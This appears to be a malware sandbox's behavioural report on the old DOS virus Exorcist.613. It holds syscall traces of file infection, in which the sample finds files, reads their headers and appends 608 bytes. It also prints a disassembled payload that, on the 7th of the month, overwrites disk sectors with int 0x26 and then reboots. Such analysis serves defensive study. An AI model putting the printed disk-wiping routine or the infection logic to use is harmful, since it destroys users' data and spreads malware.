Sample viewer

vx.netlux.org/Virus.DOS.Exorcist.613

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:10:32.69499381Z 42 PC: 12a55 | Get date
0x12a55: cmp dl, 7
0x12a58: je 0x12a5c
0x12a5a: jne 0x12a76
0x12a5c: mov ax, 2
0x12a5f: mov cx, 0x3e7
0x12a62: cli
0x12a63: cdq
0x12a64: int 0x26
0x12a66: inc ax
0x12a67: cmp ax, 5
0x12a6a: jne 0x12a64
0x12a6c: sti
0x12a6d: mov ah, 9
0x12a6f: mov dx, 0x32f
0x12a72: int 0x21
0x12a74: int 0x19
0x12a76: cmp dl, 5
0x12a79: jg 0x12a86
0x12a7b: mov ax, 0x5f08
0x12a7e: mov dl, 0
2018-12-17T23:10:32.697948483Z 26 PC: 12abc | Set disk transfer address
2018-12-17T23:10:32.699294822Z 71 PC: 12af6 | Get current directory
2018-12-17T23:10:32.701710588Z 78 PC: 12b22 | Find first file
2018-12-17T23:10:32.70622354Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T23:10:32.710738592Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:32.722757473Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-17T23:10:32.730407627Z 87 PC: 12b7b | Get or set file date and time
2018-12-17T23:10:32.732278135Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T23:10:32.736783134Z 66 PC: 12c26 | Move file pointer
2018-12-17T23:10:32.738045799Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:32.752401331Z 62 PC: 12bf2 | Close file
2018-12-17T23:10:32.764804237Z 79 PC: 12b37 | Find next file
2018-12-17T23:10:32.767791618Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T23:10:32.774936084Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:32.78947832Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-17T23:10:32.814221172Z 87 PC: 12b7b | Get or set file date and time
2018-12-17T23:10:32.817111924Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T23:10:32.836291643Z 66 PC: 12c26 | Move file pointer
2018-12-17T23:10:32.838031207Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:32.850379293Z 62 PC: 12bf2 | Close file
2018-12-17T23:10:32.852636242Z 79 PC: 12b37 | Find next file
2018-12-17T23:10:32.855598043Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T23:10:32.862035337Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:32.86979105Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-17T23:10:32.874080106Z 87 PC: 12b7b | Get or set file date and time
2018-12-17T23:10:32.875388271Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T23:10:32.883886192Z 66 PC: 12c26 | Move file pointer
2018-12-17T23:10:32.886052653Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:32.900731163Z 62 PC: 12bf2 | Close file
2018-12-17T23:10:32.904380443Z 79 PC: 12b37 | Find next file
2018-12-17T23:10:32.908012837Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T23:10:32.920047872Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:32.934861277Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-17T23:10:32.943081784Z 87 PC: 12b7b | Get or set file date and time
2018-12-17T23:10:32.945136131Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T23:10:32.952836248Z 66 PC: 12c26 | Move file pointer
2018-12-17T23:10:32.955317683Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:32.968063138Z 62 PC: 12bf2 | Close file
2018-12-17T23:10:32.970894645Z 79 PC: 12b37 | Find next file
2018-12-17T23:10:32.976145436Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T23:10:32.983459324Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:33.012670971Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-17T23:10:33.021827642Z 87 PC: 12b7b | Get or set file date and time
2018-12-17T23:10:33.023952886Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T23:10:33.031370119Z 66 PC: 12c26 | Move file pointer
2018-12-17T23:10:33.034385343Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:33.045507734Z 62 PC: 12bf2 | Close file
2018-12-17T23:10:33.047928809Z 79 PC: 12b37 | Find next file
2018-12-17T23:10:33.052054498Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T23:10:33.059001302Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:33.070027678Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-17T23:10:33.077951966Z 87 PC: 12b7b | Get or set file date and time
2018-12-17T23:10:33.08360497Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T23:10:33.091531894Z 66 PC: 12c26 | Move file pointer
2018-12-17T23:10:33.094063476Z 64 PC: 12bc4 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T23:10:33.097254734Z 64 PC: 12bcf | Write file or device (Write 608 bytes on handle 5)
2018-12-17T23:10:33.106916005Z 66 PC: 12c26 | Move file pointer
2018-12-17T23:10:33.108768913Z 64 PC: 12bda | Write file or device (Write 5 bytes on handle 5)
2018-12-17T23:10:33.116817629Z 87 PC: 12be1 | Get or set file date and time
2018-12-17T23:10:33.118837382Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:33.13089688Z 62 PC: 12bf2 | Close file
2018-12-17T23:10:33.139311815Z 79 PC: 12b37 | Find next file
2018-12-17T23:10:33.142202899Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T23:10:33.149131576Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:33.470988761Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-17T23:10:33.481896703Z 87 PC: 12b7b | Get or set file date and time
2018-12-17T23:10:33.483725169Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T23:10:33.512596585Z 66 PC: 12c26 | Move file pointer
2018-12-17T23:10:33.514665457Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:33.526424612Z 62 PC: 12bf2 | Close file
2018-12-17T23:10:33.529557627Z 79 PC: 12b37 | Find next file
2018-12-17T23:10:33.532990198Z 67 PC: 12b63 | Get or set file attributes
2018-12-17T23:10:33.539559274Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:33.550520971Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-17T23:10:33.559618462Z 87 PC: 12b7b | Get or set file date and time
2018-12-17T23:10:33.56156832Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-17T23:10:33.56900114Z 67 PC: 12c1e | Get or set file attributes
2018-12-17T23:10:33.581352293Z 62 PC: 12bf2 | Close file
2018-12-17T23:10:33.584290995Z 79 PC: 12b37 | Find next file
2018-12-17T23:10:33.58896692Z 59 PC: 12b0e | Change current directory
2018-12-17T23:10:33.60016131Z 59 PC: 12b19 | Change current directory
2018-12-17T23:10:33.605341716Z 26 PC: 12ace | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16889,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:09.903991137Z 42 PC: 12a55 | Get date
0x12a55: cmp dl, 7
0x12a58: je 0x12a5c
0x12a5a: jne 0x12a76
0x12a5c: mov ax, 2
0x12a5f: mov cx, 0x3e7
0x12a62: cli
0x12a63: cdq
0x12a64: int 0x26
0x12a66: inc ax
0x12a67: cmp ax, 5
0x12a6a: jne 0x12a64
0x12a6c: sti
0x12a6d: mov ah, 9
0x12a6f: mov dx, 0x32f
0x12a72: int 0x21
0x12a74: int 0x19
0x12a76: cmp dl, 5
0x12a79: jg 0x12a86
0x12a7b: mov ax, 0x5f08
0x12a7e: mov dl, 0
2018-12-25T12:54:09.907159376Z 95 PC: 12a82 | Network redirection functions
2018-12-25T12:54:09.909706813Z 95 PC: 12a86 | Network redirection functions
2018-12-25T12:54:09.911813103Z 26 PC: 12abc | Set disk transfer address
2018-12-25T12:54:09.913230782Z 71 PC: 12af6 | Get current directory
2018-12-25T12:54:09.916452107Z 78 PC: 12b22 | Find first file
2018-12-25T12:54:09.919137325Z 59 PC: 12b0e | Change current directory
2018-12-25T12:54:09.921675484Z 59 PC: 12b19 | Change current directory
2018-12-25T12:54:09.93092134Z 26 PC: 12ace | Set disk transfer address

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16889,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:10.051048752Z 42 PC: 12a55 | Get date
0x12a55: cmp dl, 7
0x12a58: je 0x12a5c
0x12a5a: jne 0x12a76
0x12a5c: mov ax, 2
0x12a5f: mov cx, 0x3e7
0x12a62: cli
0x12a63: cdq
0x12a64: int 0x26
0x12a66: inc ax
0x12a67: cmp ax, 5
0x12a6a: jne 0x12a64
0x12a6c: sti
0x12a6d: mov ah, 9
0x12a6f: mov dx, 0x32f
0x12a72: int 0x21
0x12a74: int 0x19
0x12a76: cmp dl, 5
0x12a79: jg 0x12a86
0x12a7b: mov ax, 0x5f08
0x12a7e: mov dl, 0
2018-12-25T12:54:10.055267831Z 26 PC: 12abc | Set disk transfer address
2018-12-25T12:54:10.056663022Z 71 PC: 12af6 | Get current directory
2018-12-25T12:54:10.060598708Z 78 PC: 12b22 | Find first file
2018-12-25T12:54:10.067503489Z 67 PC: 12b63 | Get or set file attributes
2018-12-25T12:54:10.074818017Z 67 PC: 12c1e | Get or set file attributes
2018-12-25T12:54:10.09439093Z 61 PC: 12b70 | Open file (Filename = '')
2018-12-25T12:54:10.119147611Z 87 PC: 12b7b | Get or set file date and time
2018-12-25T12:54:10.134054334Z 63 PC: 12b88 | Read file or device (Read 28 bytes on handle 5)
2018-12-25T12:54:10.141586964Z 66 PC: 12c26 | Move file pointer
2018-12-25T12:54:10.143597164Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.15601125Z 62 PC: 12bf2 | Close file
2018-12-25T12:54:10.15837576Z 79 PC: 12b37 | Find next file
2018-12-25T12:54:10.161652915Z 67 PC: 12b63 | Get or set file attributes (See above)
2018-12-25T12:54:10.168723539Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.180345165Z 61 PC: 12b70 | Open file (See above)
2018-12-25T12:54:10.188101239Z 87 PC: 12b7b | Get or set file date and time (See above)
2018-12-25T12:54:10.190642985Z 63 PC: 12b88 | Read file or device (See above)
2018-12-25T12:54:10.198056678Z 66 PC: 12c26 | Move file pointer (See above)
2018-12-25T12:54:10.199851625Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.211961566Z 62 PC: 12bf2 | Close file (See above)
2018-12-25T12:54:10.214481651Z 79 PC: 12b37 | Find next file (See above)
2018-12-25T12:54:10.218232546Z 67 PC: 12b63 | Get or set file attributes (See above)
2018-12-25T12:54:10.224848462Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.236390254Z 61 PC: 12b70 | Open file (See above)
2018-12-25T12:54:10.248342053Z 87 PC: 12b7b | Get or set file date and time (See above)
2018-12-25T12:54:10.2503084Z 63 PC: 12b88 | Read file or device (See above)
2018-12-25T12:54:10.258728078Z 66 PC: 12c26 | Move file pointer (See above)
2018-12-25T12:54:10.261286408Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.272750917Z 62 PC: 12bf2 | Close file (See above)
2018-12-25T12:54:10.276232275Z 79 PC: 12b37 | Find next file (See above)
2018-12-25T12:54:10.279303173Z 67 PC: 12b63 | Get or set file attributes (See above)
2018-12-25T12:54:10.285649916Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.297684304Z 61 PC: 12b70 | Open file (See above)
2018-12-25T12:54:10.30599633Z 87 PC: 12b7b | Get or set file date and time (See above)
2018-12-25T12:54:10.307627433Z 63 PC: 12b88 | Read file or device (See above)
2018-12-25T12:54:10.315432502Z 66 PC: 12c26 | Move file pointer (See above)
2018-12-25T12:54:10.317314188Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.32866686Z 62 PC: 12bf2 | Close file (See above)
2018-12-25T12:54:10.331107237Z 79 PC: 12b37 | Find next file (See above)
2018-12-25T12:54:10.334416161Z 67 PC: 12b63 | Get or set file attributes (See above)
2018-12-25T12:54:10.341169309Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.35262652Z 61 PC: 12b70 | Open file (See above)
2018-12-25T12:54:10.36054773Z 87 PC: 12b7b | Get or set file date and time (See above)
2018-12-25T12:54:10.362460545Z 63 PC: 12b88 | Read file or device (See above)
2018-12-25T12:54:10.370418678Z 66 PC: 12c26 | Move file pointer (See above)
2018-12-25T12:54:10.373941139Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.385208173Z 62 PC: 12bf2 | Close file (See above)
2018-12-25T12:54:10.38759835Z 79 PC: 12b37 | Find next file (See above)
2018-12-25T12:54:10.391868103Z 67 PC: 12b63 | Get or set file attributes (See above)
2018-12-25T12:54:10.398982662Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.410071622Z 61 PC: 12b70 | Open file (See above)
2018-12-25T12:54:10.41810157Z 87 PC: 12b7b | Get or set file date and time (See above)
2018-12-25T12:54:10.41976639Z 63 PC: 12b88 | Read file or device (See above)
2018-12-25T12:54:10.427428436Z 66 PC: 12c26 | Move file pointer (See above)
2018-12-25T12:54:10.430651744Z 64 PC: 12bc4 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:54:10.435085228Z 64 PC: 12bcf | Write file or device (Write 608 bytes on handle 5)
2018-12-25T12:54:10.445164667Z 66 PC: 12c26 | Move file pointer (See above)
2018-12-25T12:54:10.447287066Z 64 PC: 12bda | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:54:10.455590388Z 87 PC: 12be1 | Get or set file date and time
2018-12-25T12:54:10.457753894Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.47019053Z 62 PC: 12bf2 | Close file (See above)
2018-12-25T12:54:10.478543921Z 79 PC: 12b37 | Find next file (See above)
2018-12-25T12:54:10.481556403Z 67 PC: 12b63 | Get or set file attributes (See above)
2018-12-25T12:54:10.488041264Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.500694017Z 61 PC: 12b70 | Open file (See above)
2018-12-25T12:54:10.508844833Z 87 PC: 12b7b | Get or set file date and time (See above)
2018-12-25T12:54:10.51083957Z 63 PC: 12b88 | Read file or device (See above)
2018-12-25T12:54:10.519183819Z 66 PC: 12c26 | Move file pointer (See above)
2018-12-25T12:54:10.521521782Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.548962912Z 62 PC: 12bf2 | Close file (See above)
2018-12-25T12:54:10.552070581Z 79 PC: 12b37 | Find next file (See above)
2018-12-25T12:54:10.555124861Z 67 PC: 12b63 | Get or set file attributes (See above)
2018-12-25T12:54:10.562309778Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.573320793Z 61 PC: 12b70 | Open file (See above)
2018-12-25T12:54:10.58165061Z 87 PC: 12b7b | Get or set file date and time (See above)
2018-12-25T12:54:10.583487242Z 63 PC: 12b88 | Read file or device (See above)
2018-12-25T12:54:10.600905255Z 67 PC: 12c1e | Get or set file attributes (See above)
2018-12-25T12:54:10.612660945Z 62 PC: 12bf2 | Close file (See above)
2018-12-25T12:54:10.615029947Z 79 PC: 12b37 | Find next file (See above)
2018-12-25T12:54:10.61792876Z 59 PC: 12b0e | Change current directory
2018-12-25T12:54:10.623790046Z 59 PC: 12b19 | Change current directory
2018-12-25T12:54:10.629273888Z 26 PC: 12ace | Set disk transfer address

{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16889,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:10.075719107Z 42 PC: 12a55 | Get date
0x12a55: cmp dl, 7
0x12a58: je 0x12a5c
0x12a5a: jne 0x12a76
0x12a5c: mov ax, 2
0x12a5f: mov cx, 0x3e7
0x12a62: cli
0x12a63: cdq
0x12a64: int 0x26
0x12a66: inc ax
0x12a67: cmp ax, 5
0x12a6a: jne 0x12a64
0x12a6c: sti
0x12a6d: mov ah, 9
0x12a6f: mov dx, 0x32f
0x12a72: int 0x21
0x12a74: int 0x19
0x12a76: cmp dl, 5
0x12a79: jg 0x12a86
0x12a7b: mov ax, 0x5f08
0x12a7e: mov dl, 0